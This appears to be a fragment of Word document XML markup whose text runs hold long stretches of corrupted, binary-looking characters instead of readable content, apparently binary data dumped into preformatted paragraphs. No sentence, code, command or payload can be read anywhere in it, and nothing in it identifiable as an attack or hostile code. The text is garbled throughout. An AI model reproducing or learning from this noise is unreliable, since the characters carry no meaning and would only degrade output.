      <w:r>
        <w:rPr/>
        <w:t>;?n?g ??q?d</w:t>
        <w:tab/>
        <w:t>?o???0?i?\y$???#LD## ####(b</w:t>
        <w:br/>
        <w:t>i??T&gt;???Н_2??#?!?l"#5#@?&amp;?o#c##0?o&gt;#4~??#9###?-#?n</w:t>
        <w:br/>
        <w:t>i??????#?H???V??+??#?????#?"?x?%??/Yi?1##?#</w:t>
        <w:tab/>
        <w:t>?)|???o?zv?)??H??2????R##?7??z?{?#?g?;4?##??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7?#??k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 ?#?F?H?##?a\z 5##@?#?(H##?##h#?L?U????H</w:t>
        <w:br/>
        <w:t>?h&amp;?5?#??#w#???&gt;?:?###?I#}#?4?#?0#-??H</w:t>
        <w:tab/>
        <w:t>??T#$##@#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N?pc??G?|??#S????3n2s??QF@ ##?`?=R#??%?+#####3f??x?:q?D1::?PS?%K?te?#?.???E#??/??##@##?#p1?}}}I?#????'??'??##?"??Q(???#cX/???NSj?9o?&lt;q??ak????/?#?#?t-7#?#?#?'X4~&gt;i".####?K?d</w:t>
        <w:br/>
        <w:t>?r?q???q#6l??b??4MT7?t?=M+?##B#@?($???1??}Tw6#.[#W?\)L?????q????p?Rn8??.q?#???#I?## ##~</w:t>
        <w:tab/>
        <w:t>?L?+n#????#?d</w:t>
        <w:br/>
        <w:t>i#??6??e</w:t>
        <w:br/>
        <w:t>?~?#?y?o#Cl##?#?Y4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9W???0u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?)??pt#nXn8???\???7Q?## ##?</w:t>
        <w:tab/>
        <w:t>?)?#'?#?#?d#??h?r?#x#?7?qjZ(#?)#(????#S?L#?##??j??q?m[kZ?i?n?B??###??4###?##?'Ы??#?#?iA?)????h?r?#?#?7?jRH#?&amp;?#(?r3#2??^{m??#95?n/M?u?Rc2?y?h-c?8}?B??&amp;?####?r#l?p`M??+??w=p?q???;?$#???????A??#?F??###?!B?L???&gt;?G#???#&amp;.D????]+??3?-_?????#|of</w:t>
        <w:tab/>
        <w:t>.?2?2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x]?#?^z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&amp;???#?h???_&gt;b4?W|?cI?L?????)?}-???#?a?##O?:b?O%?y???#"N???V?'M?## ##?#?F</w:t>
        <w:br/>
        <w:t>????.?KL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w\?</w:t>
        <w:tab/>
        <w:t>?F#o????O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####?7?#1?(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$e#?"?#i?c???$7,7?o~h?|#E| ## ?F??#?94-cp?c??d???1?????Cc?Gi??Cc??M b#?##?#?YD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9W4e?t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;??#?#?#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y4~??!&gt;####?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w????y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dDP??Y\{K???o?z6v#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>%</w:t>
        <w:br/>
        <w:t>?u"#c</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>脫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1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?????o_m&amp;R?c?#?r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##??4###?##?</w:t>
        <w:tab/>
        <w:t>?h</w:t>
        <w:br/>
        <w:t>i???7?u?#???4A????w#w##?z#v#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}???k?#?&amp;??V??GV???t?)????#??????y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7\?8}1F??$?#####&gt;?#M!?^?#^}éb??s[#??#??#???n???p?#???(?? d##z?o$??rM??{?D/?i?}?</w:t>
        <w:br/>
        <w:t>d)}##??#?@?T#v?9??c?R?;??D??B??C?^n?|?C# ## ?J?f</w:t>
        <w:br/>
        <w:t>????wm4C?&amp;L#%#?h??#?s?#??2?4jx???d?yt?}k]?!&lt;##'#?o$g?????wu?)???#c??m^X??L#??#K?E#\#O7?1?##?K t?.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?</w:t>
        <w:tab/>
        <w:t>|????Xt?b?-??</w:t>
        <w:tab/>
        <w:t>#&amp;t???#SH$??B##??9jx?#?(?#??#? ?##1##?7?G????3?y#M???0?hS#(L3??w?Z9J(?W???Q?[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Z#???_-#?MA##@ R#k~p??????#??#!?#&gt;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?WmcH;??ZC|@ V#!?F?,?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#6???ǘ6???;?^???</w:t>
        <w:tab/>
        <w:t>??#??P#Q?U?#?)??FC D?#M?#####????)??W?#I?y?#??e?????@?O#5??H?#}?#)B?@M#B?h?m?i??????!g7{#?7l?!?v??u?$O??b?0:\?+#B4~??#?#######?)&lt;??!???K?r??*?y?P#5&lt;E???=Q?#?###??}##?s??&gt;E?dDU?o???Lu#???J#?a??BZk!#??%S?)#?##DB?f</w:t>
        <w:br/>
        <w:t>???V??&amp;???B}??m???D#$##?#B????P?|???#Q#!?&amp;?%??+?i?a#?#?a#UC?+%#??43?##?##DD?#L!???gX[?O'}O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H???##1#X?|?????o???;??#C##?nP??#1{#ch?7M!?G#?8?v,?YW#??A? #c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?@b#z?#n=2#h[[??5??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>),?^?##?L t??1$^dФ##1?T??j?N'?G#?6i?!?a?#i??@??/?L"# ## P!#?)???b?I]GR4q??o#?????3???6????????`??b?[? #?oT?#???r??&gt;??????&gt;*I&amp;Q5??{?###-A??K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;5?@???X?l####(D ?#N?&lt;9</w:t>
        <w:tab/>
        <w:t>Sx?#7#:rB?Kh??f#1jX?XUv???|M???</w:t>
        <w:br/>
        <w:t>????5?B??|#C?N?r?KX?U#M??{??#6?LC#D?#q'A t?#$d##@####R7?t????#:#?b#?????'7???!?(?#??)???x?7#?7*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SG???j?Mg#????L?D?s#1b??!*#??@??/?&lt;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 #???)\?pa?$y??6?????n??9J??_o?DD^#Hsw???#?!_?,cH????g???#??#v?m?i?????#???b?!_s?#?F#?1l?LH$#?@?#R6?#??+?q???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">?4?#??I?1|B?#}#i??#(???;???jX?&amp;/?d?auC'#3'?#?4?9?x?y???'?#d:u#!#??! ##  </w:t>
        <w:tab/>
        <w:t>?j</w:t>
        <w:br/>
        <w:t>i?p?}k??p?#?#m@?OZ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JJ3s?5???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???#?a??q+##??#?j</w:t>
        <w:br/>
        <w:t>#??#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?a4??=??O?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O?</w:t>
        <w:br/>
        <w:t>?0eu?7/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D$ ##=F?f</w:t>
        <w:br/>
        <w:t>o??′?h#?#&gt;???b??/YG</w:t>
        <w:tab/>
        <w:t>o?{??0??K#?#?0??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>c????'#0??@"###??!0?yT?x???S/##;??-?O??u$E#L?=##u#A?n.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!&gt;?#?1?1L??c?0eu?7/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D$ ##=B`??=I???A?G???w#?]Hi?!?7?7#?#?#?\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V#y?B#??#FD## ?##\M??????u##?WH?#??##~??#q??&gt;????</w:t>
        <w:br/>
        <w:br/>
        <w:t>??*z??49?0?MV#i??#?a%?q###??#0????$~|?q??Y????#???z#1#?iA??B|?'???##?g????/n?:?#b?0?#c????##0?^0"###??</w:t>
        <w:tab/>
        <w:t>?L????7?#?#(l#?_?#??##</w:t>
        <w:tab/>
        <w:t>?c?59:x?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!?a?U#?0eu?7/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D$ ##?#H?#f#TO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#x??G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*?e?#?#?#?a#????#?#?8!##?@?#H?#??#t?????:?#GP?[???]b??????utP#?._?5??+</w:t>
        <w:br/>
        <w:t>?#?Y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H#??G??</w:t>
        <w:br/>
        <w:t>#@ ##6S??'{??3????qM!#?O?8:e?F##??{?#}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#??o^+#{???=0??</w:t>
        <w:tab/>
        <w:t>??#9#??#?1l?THh]#???E#?###??@?)$#8n????L!#Aq?#?QB#A#k?+?.?????o?iZ??w?r#???#???T?#?&amp;???#??/9I?!##?##?n</w:t>
        <w:br/>
        <w:t>qP}</w:t>
        <w:tab/>
        <w:t>?#xi??ASv?}???Q?,???##?)|?7JA??&lt;?#??+r?##??0###?@?</w:t>
        <w:tab/>
        <w:t>?????????(?LGPЮ?????#)???B&amp;o??1:?-1</w:t>
        <w:tab/>
        <w:t>F??Q??#?#?a??"W#</w:t>
        <w:tab/>
        <w:t>???##Q?##4?@?M!#?ol?sJ8?#????.0oz??v??F#?5???##?D?-??????L?8Q???vEw??#1c??5$K?,)#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Y#t=??#??##@??#?j</w:t>
        <w:br/>
        <w:t>?#???##G</w:t>
        <w:tab/>
        <w:t>?#??#??? ?#@k#?#Cm??v#?#HMk##?#?Fn??##?)JU??#;v???&gt;?1??#?~??7o?8|?p+e?#?;n8??#?#?'.4~&gt;i".##??#h?)?#????A?M+???u##??Gi#RZo??##?#??#[,0??)Rsz?##??s?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\i??F#???[??s</w:t>
        <w:tab/>
        <w:t>?#?/?h?|?D&lt; ##M#`3???_?=?k??#?#?##??l?(??o&gt;C????4#?^???? ?5???#??3?!F#?#T?(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??o?&gt;?N?O%5?????QC?R?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>G?r?r?????7Q?## ?##d?N?pc???Kn#???#?3?t#=#F???P????A7^U?F?</w:t>
        <w:br/>
        <w:t>???#?z???Q#/?V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gD5n?mkMG5?;?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>^?8}BF??&amp;?###h#???##?#?M!?#?h??#???_??#?H?F?#?,~?Kr7??k#1:X]#B?:?U?</w:t>
        <w:tab/>
        <w:t>?J???iN?2E#:t???,c?n????a^8Z?(?a^Xi6???u??p???E#?##4???)?&lt;yrmGR?A??#(?$??&amp;???4#|?!q?5_#??o^?!?????E?&gt;?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?n??6??^2?k?m?&gt;j?[?|??7?5???#\?#e ?2p?_#???)??/]-?;?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>飿</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???/?;?Z????;???c#%??#?#???Z?2^??_}??????5??N:Q\?h??§&gt;#}-????`???H*?#?!#T???#?;??#?M#?T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 ?##?H!M%?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>hLk</w:t>
        <w:br/>
        <w:t>i?pdd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P??#</w:t>
        <w:br/>
        <w:t>#T_?#?n?2:x??#????F???#+uO\?@/?#?#r???JV????L6?</w:t>
        <w:br/>
        <w:t>?c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!q?3??]t?!?FκAi.?a??|c????7K?## #'?&amp;?B:?"?z?RJ?#??</w:t>
        <w:tab/>
        <w:t>???;.?????[?"???#?ov?#?z,???F?oj#???C??#??]?K?Q-#?]?c/&amp;0??+TA????#???C?Π?#?#??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#Y???wz###?##?#h?)???mGP?A??&lt;8?e???#???????v#??5#?x?}##???Q?1?k?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g???t???G?????/?0?hk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#cX+??on#1?#???p???#????4"#####(B ?#.]???a??G?#??t?*A#??#'#??I???????2?0:#???T??#?S47l? ?#o????=?#?#?&gt;B?#C}D?Y?</w:t>
        <w:br/>
        <w:t>#c?4?*L????oO(I?i??p???:?q?B#???6?## ##E</w:t>
        <w:tab/>
        <w:t>?n</w:t>
        <w:br/>
        <w:t>?z?##?=??O?#ht??????3?##?SüT??#Q?o?i????#???pf??:S;o????#?y#c?#?06E"J??#R#??????p???3D??#]?##@##?#p5??&amp;M?l?????o?{??0??E#??q?#:5??FY???#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4??#q?}##??#?m??Z??#??'M?$??_?А)##?h</w:t>
        <w:tab/>
        <w:t>???</w:t>
        <w:tab/>
        <w:t>#&amp;?f?T???f?vP=?5?'.#.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&lt;??E??HjB??8?0?\k??gj??o?????##?Z?50?u+??GO t?#=#$##@ ##??????#</w:t>
        <w:br/>
        <w:t>#T#W#|??G?k#?z:?????'##Yg&lt;???e?1#CS??c??$?8q?D1::Z#Ge??#V?#7j*##?*?t?##?#b5?YGP?y?8?"?r?w?#?V}^?&lt;?/s?#???xR???$#?o?1?u??m:?P?N??#??7MZs#c</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">賖 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?$</w:t>
        <w:tab/>
        <w:t>?n????L?##DE FS?uP=M'%èO?#ht???'n??#s? F#???#??#?5???????SP?$?F?~???o?!?aU5#?i,??_c? ? ##? ?e</w:t>
        <w:br/>
        <w:t>W?Z?u$E?5??#</w:t>
        <w:br/>
        <w:t>?"jZKH#??#???#F#?? ?#??#??4??&amp;?h</w:t>
        <w:br/>
        <w:t>uG}}??ig#?#?\?(#?n???$### ?$???&gt;"N?lH?x???????????M!#????at0n}bJ]?Q?1$#????\?:?????#b?0?R????##?#?#ID# ## ?E &amp;SH?K?1#?#B?n??/?#?#????]?/o?,?Oo##?7?3?????H?"a???;</w:t>
        <w:br/>
        <w:t>?&gt;?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? ?</w:t>
        <w:tab/>
        <w:t>##?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#????#^???8R???'?????##?#?Z:??#~X?????#X??v??PX?### #!?F?n??(#?_?x</w:t>
        <w:br/>
        <w:t>?Y??p?/NX9???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?!?3???+ ? ?#?_???%##?H#?L?#?o5?#6l?zZ'x?#?QB#A?#9+???o#4???w????p####?</w:t>
        <w:tab/>
        <w:t>?o?f??#?4uE?&lt;#@??#&amp;?####J #S?????#9F#???##?#?YD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H#??G??</w:t>
        <w:br/>
        <w:t>#@ #?#L!#AA????#?.?8?"???1:X-?^?#?Fi?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>c????G#h?&lt;?DT ##A#?`</w:t>
        <w:br/>
        <w:t>qP}#i?#??32\P?#?F#?5?##?#??$?K#?_??qw###!??p???v#Qd?BZ;H#?#8???\SHG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8JH#????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??##?S?O&gt;sI?AZ[???##??-?7JS`#?4uE?&lt;#@??#&amp;?###p&amp;@#??s#??A?S?)?#????A?B???XF?#??&gt;?Y^#&gt;?P?#??o^?}n??#??O?Y???@Y#?#?%#??0?q?TED#?_Db ) ?c#?#?|???</w:t>
        <w:tab/>
        <w:t>??)?QC_#?t#?7n=?8J????##????R??rv??#c??F#???s???s?R?:b.?B|@?'#?|?'.#?x?@J"%??/Ra?,#H??j</w:t>
        <w:br/>
        <w:t>?u?&amp;?O#?#?_?z?P?a?QE:??4}?L???@ibtP=#F???y(??y?I??O^+??A#s???#?F?p??.0?U#??#G#?_?$C?A??#tSx??7##9???#????Ц?F#i4?d</w:t>
        <w:br/>
        <w:t>i?p?/?l&lt;w?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:?[#??#?F&gt;(?##?a|? E?#@?#? H##$N?f</w:t>
        <w:br/>
        <w:t>??aHSH#??? ?????#?1?j????7#?f#}?H?)?,#ò#qy?#????1r##?#?3?&amp;sx???/??Q?Q?v#5?#?N??#)&gt;?#C?#D???#?Fu+#??0?a?"?#??KHLd##"&amp;`2?o\t?x??!^???M&gt;V???7?W?&lt;]??'~???#?8?*q????8???B:??v###??#"?#??|???#o??|</w:t>
        <w:tab/>
        <w:t>#2##?#??9Z#ú#???'??/~??B#h:?????7???ff??-????????##????)??;?)?#(?#??)?d#??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{???K_#???#?#####@?#?5?#?#?e?#??k?^H-#4??????6????G??3M?j#??.??(M#?#AA?I?yp??hkM?#c???#?5#?9#?#?o?f??1LSW??##4~#a"*##?##:?pp?X?/?;??x????&gt;??|p?????#??t?*A#???N??1t?+?#??#?7</w:t>
        <w:br/>
        <w:t>??;?#?A#?l##4~??#?#?(</w:t>
        <w:tab/>
        <w:t>&lt;?????;??+#?#?]???#?#?=??0k40?O~??y???mGP???;&gt;n#??#?#?????#?g#Rx?#C?T 4#?%??QX?u?#cX#y?1#??5F*$##?"@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??o?#A?,??ν??)$?t?Rv??#????????#`2??1#0?&lt;?#?##?#5G+???#??B?$??'eG?A????_&lt;?#:???XfP#?3??1&lt;?#-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J3?#?#AA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??3?0?&lt;?#?L#?#5S??T?#?#??=O#?_?#######??PuTP?7M'??[?##??###}??#?FJ?M?&lt;9S?????#</w:t>
        <w:br/>
        <w:t>#T?_?]? ?a&gt;O?h.#??]V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?????)###6?u??#1c???K?,?</w:t>
        <w:br/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>G#r?r?#?`?#??/??##?O`???N?CUSx??????6?1}??1?t??u##?W?#(?e??#?????#??4??##f#?#?Y2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9W+W?#???#?##n]??/?#??_?#??#??#;D___?w?pt?nXn8g###???I#q?@?#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>顗</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??C#?#?zyb???????mf?7l? ^??#?2?#&amp;L?G?A?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?#?A?V~?Qa?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}@ F#?#?J?4?#?g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G?%#9q?D1::?w???XK#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#*N_???E#?@?##=?x{??EW??N?????C##;??Yj_W?Z%f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??#(h??U7???G#??#?N?|?A5?m#??=jX?#??##?4HaO#@?(M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K?L?s??????)??pt-7,7???+????M#?@\#BN#?9?w?X?n?X?p??4i?73?#??#?n?????+?#??#!A??#R?#?~?lWM??:u?]sU?N9?aJjz?K?M?zB5??m?ZSK????U?P?Y(#?O#)6~&gt;? .#h##?#z??nQtz?#???==????#?O#b#USH????##3a#!????#??8RXa#?Vc??#</w:t>
        <w:tab/>
        <w:t>??#?_???V?5???s?#N???VJ?mv???#5*?&amp;#?"?z?#YA??(M????L\^8?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>慕</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>f3/?\'?K?#????!###?|#rz(#???C?H?M#?kW{z(#5??d?N?*h???K/u??)OyJ+???1#T?Q#`#??</w:t>
        <w:tab/>
        <w:t>B??#?#}#S??&amp;?#?p?+G</w:t>
        <w:tab/>
        <w:t>?u?&gt;?mcF#~???1?U???%+?)S?C??I?#?]?VP#g?[?|??7?5???#\???2?eW?3/??x??A?u???(]?K##???O}?S??N#?#w\kC.##H?_??SN9EP&lt;?}???x??^5???Q????##????'??_x???G?F|w?)?u~#???k?*??#???#?]U#c???#N#!??&gt;??;??#c#?#??C#]??#</w:t>
        <w:tab/>
        <w:t>1?3D?&gt;q?x+?3}?##@@???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CgΜ)?E#?yy???#A????S?8?h</w:t>
        <w:br/>
        <w:t>{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##~#??#q?!w?</w:t>
        <w:tab/>
        <w:t>n8"?7bH?b}??#?b?1?K?(R#M?i?&amp;????ln8?2f?Gt??'?#????!.#?E#4=???(:=??#?L#???N########t???=#?w?2M??k&amp;???~Z?$???#?W?#??_?e</w:t>
        <w:br/>
        <w:t>i#?^;?#fйh?##(M D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}L?#?e?#i"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R?B*##?a</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騎</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>V#??</w:t>
        <w:tab/>
        <w:t>?I??r????##?OUB4~&gt;??@?W#???+??#??sV#;O#?k?Z?#?366??=???y#??4?722RZ????^??]}é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q???&gt;???#??#,]?###?"#?od?|F#?#??I#?Pw%5?5,#.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</w:t>
        <w:br/>
        <w:t>i3?2-4????#??????-D??3}?##R%@????C?@Z????Mf??4????jz??N????[&amp;p???i#??xZ?|????tP?]#??#}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N2$8a#Y?/о</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?&gt;?#?P?Дf?w?)?}?8??3)??????x?)??b:??4??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???Q?_6N_??#?"?x@ ?@??C?????C?:?,Qtz???c??*?????4P:V?_o??##?7?????Q??#??#D?##q#??o?#</w:t>
        <w:br/>
        <w:t>??Jj??nH??#?aMq?!?a????T??w?7&lt;???C@)?i?57#e?#?#?#?*#?_iF&lt; ?##4???#?#:????d?N#%#?cz(????##???m??V??[?;#?q???F#;G#?0?r???#??##k?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! #?F???#5??L?1,?7?&gt;*I&amp;Q5??{?###?M?#7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q&amp;E???/)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</w:r>
      <w:r>
        <w:rPr/>
        <w:t>顗</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?'???Лw?#y?C?l???=?#N???S#F??4)???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>硱</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>{?=##????#??mi???#??7?#?k</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>o?oM?$Fq=?`#2 # ?&amp;Pe?H7??},???L?##u#?&gt;B??b?##y@#??#B??'Pe?Wn?##?K????=??+7??#?Z???$??t#E?#??sz??????TP?0????F0\#?#.s?PN'}O+????????#?`#UC?A?</w:t>
        <w:tab/>
        <w:t>#U???I?mr???Su5M#??9?!j##?(??#?#?l'H??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>顴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???PZ_Xtz(M#}?#;ZSAo??&lt;#?is5?d&amp;???"??B9Z(???J?#dF??#l?RH'#d#??7??=2???s?}?Ma#</w:t>
        <w:tab/>
        <w:t>??b?!j##?(#?_?bD?+&amp;p??{?g?????????????C?#?Kp??.]????P??uz??GF?O???</w:t>
        <w:br/>
        <w:t>J;??#&gt;=&lt;?A?Jiz)M3?{?y'R????_Z?QC??J?!n##?##?7?SF???Y#?p???????????4?+i??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7#?x#?h???#R?"??????I???GN#]}?|#?#:?yT?M#??^??P:#P_#??????=??&amp;???SAo?{u????h!m,C??4?H??4?h???H????G</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>a#?J#~#?f#@????R?5?i?\y$???#LD#?#??/???χ9??#??C?#??i? ?#??o#?{?Α?3?O#??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>顴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?'?#?SA?q??G#???TPZ_HS;)~???b ?0?s????#?F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>a#?Wo?##?!??Q4RxM#??W??,E#h?RT5?&lt;???]#m#?Z??At5?UN#?#@??#J;?fM##{???TP2?4}3?TТ%?v#-;E????#3X5q?##? ??Q#:?N#??o??/9#h??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o:2rx#?#??P?????%??]?L#=??D??t??iz(?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????</w:t>
        <w:tab/>
        <w:t>?a?h*(?5?</w:t>
        <w:br/>
        <w:t>Z?`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Vb#Se?j?4p??#?B8#H?#?Fij#c????G#h?&lt;?DTA#?La?9??C???O??9=???9x?`{z??S??</w:t>
        <w:tab/>
        <w:t>???</w:t>
        <w:tab/>
        <w:t>?{(#G!??=?h{*?;V</w:t>
        <w:tab/>
        <w:t>?SA???#M#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"n$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"#?##?#@?(#!&lt;'#??3PD?##4~?i?R??L??#???a??#?t2?#^?#??#?DHS;}M#???#?????~??3J?#?z=uWP:?#?n#0?(# ##6#?#?Y6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H#??G???+#?)4?ü?A:\?ez????(:=t????????m?????#h?TP???##?`??qk#h##?#$?C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!ho#@???????G?h?#i???</w:t>
        <w:br/>
        <w:t>???C??W??z????o#??y???OZ??c?n#iz(?1?N#]?x?(2=?/O&gt;I\????#? h*?u??-=</w:t>
        <w:br/>
        <w:t>??</w:t>
        <w:br/>
        <w:t>???n?#f?#B?###??Q??#?0M]?+?#??y????</w:t>
        <w:tab/>
        <w:t>&lt;z???1#d??????###q???1&lt;??????x??^?????D??#_?BJ?Ci???;v?hM#?9s??:A:k?U?Gb?Y??gW???TP{#?????#?sV?W}?]?`#?###@?@#}?4?#?a??"W#</w:t>
        <w:tab/>
